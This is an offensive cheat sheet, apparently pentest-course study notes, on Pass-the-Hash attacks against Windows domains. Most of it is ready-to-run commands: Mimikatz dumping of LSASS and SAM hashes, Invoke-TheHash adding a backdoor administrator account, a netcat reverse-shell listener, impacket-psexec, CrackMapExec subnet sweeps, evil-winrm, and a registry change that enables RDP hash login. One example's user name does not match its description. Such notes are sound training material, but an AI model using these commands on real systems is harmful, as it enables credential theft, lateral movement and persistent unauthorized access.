# Pass the Hash (PtH) Attack
## Performing Pass the Hash Attacks
***
### 1. **Mimikatz** (Windows)
#### **Mimikatz Pass the Hash Command:**
mimikatz.exe privilege::debug sekurlsa::pth /user:david /domain:inlanefreight.htb /rc4:c39f2beb3d2ec06a62cb887fb391dee0 /run:cmd.exe exit
* Launches `cmd.exe` as `julio`.
* Commands executed in Julioβs context.
#### **Mimikatz Extract Hashes Command**
1. dumps the hashes from memory
```
mimikatz.exe privilege::debug sekurlsa::logonpasswords
```
2. elevates your token, and dumps the SAM hashes
```
mimikatz.exe privilege::debug token::elevate lsadump::sam
```
π [Mimikatz GitHub](https://github.com/gentilkiwi/mimikatz)
***
### 2. **Invoke-TheHash** (Windows)
#### Using SMB Execution:
{% code overflow="wrap" %}
```powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-SMBExec -Target 172.16.1.10 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command "net user mark Password123 /add && net localgroup administrators mark /add" -Verbose
```
{% endcode %}
#### Reverse Shell via WMI:
1. Start a listener:
```bash
.\nc.exe -lvnp 8001
```
2. Generate reverse shell payload from [Reverse Shell Generator](https://www.revshells.com/).
2. Execute using: Invoke-TheHash with WMI
{% code overflow="wrap" %}
```powershell
Import-Module .\Invoke-TheHash.psd1
Invoke-WMIExec -Target DC01 -Domain inlanefreight.htb -Username julio -Hash 64F12CDDAA88057E06A81B54E73B949B -Command ""
```
{% endcode %}
***
### 3. **Impacket-psexec** (Linux)
**PsExec Example:**
{% code overflow="wrap" %}
```bash
impacket-psexec administrator@10.129.201.126 -hashes :30B3783CE2ABF1AF70F77D0660CF3453
```
{% endcode %}
Other useful tools:
* `impacket-wmiexec`
* `impacket-atexec`
* `impacket-smbexec`
π [Impacket GitHub](https://github.com/fortra/impacket)
***
### 4. **CrackMapExec** (Linux)
**Authentication and Command Execution:**
{% code overflow="wrap" %}
```bash
# Passing the Hash
crackmapexec smb 172.16.1.0/24 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453
# Command Execution
crackmapexec smb 10.129.201.126 -u Administrator -d . -H 30B3783CE2ABF1AF70F77D0660CF3453 -x whoami
```
{% endcode %}
> π¬ *Pwn3d!* means administrative access was successfully obtained.
π [NetExec Wiki (formerly CrackMapExec)](https://netexec.readthedocs.io/)
***
### 5. **evil-winrm** (Linux)
**Establish PowerShell Remoting Session:**
```bash
evil-winrm -i 10.129.201.126 -u Administrator -H 30B3783CE2ABF1AF70F77D0660CF3453
```
π [evil-winrm GitHub](https://github.com/Hackplayers/evil-winrm)
***
### 6. Pass the Hash via **RDP** (Linux)
#### Requirements:
* **Restricted Admin Mode** must be enabled.
**Enable Restricted Admin Mode:**
This can be enabled by adding a new registry key DisableRestrictedAdmin (REG\_DWORD) under HKEY\_LOCAL\_MACHINE\System\CurrentControlSet\Control\Lsa with the value of 0. It can be done using the following command:
{% code overflow="wrap" %}
```bash
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
```
{% endcode %}
Pass the Hash Using RDP
```bash
xfreerdp /v:10.129.201.126 /u:julio /pth:64F12CDDAA88057E06A81B54E73B949B
```
π [FreeRDP GitHub](https://github.com/FreeRDP/FreeRDP)
***
## β οΈ UAC Limitations for Local Accounts
UAC (User Account Control) limits local users' ability to perform remote administration operations. When the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy is set to 0, it means that the built-in local admin account (RID-500, "Administrator") is the only local account allowed to perform remote administration tasks. Setting it to 1 allows the other local admins as well.
* **LocalAccountTokenFilterPolicy** determines if local users (besides built-in admin) can perform remote administration.
* **FilterAdministratorToken** can UAC-protect even the built-in administrator account.
π [Pass-the-Hash is Dead: LocalAccountTokenFilterPolicy](https://posts.specterops.io/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy-bbc7c81c8797)
***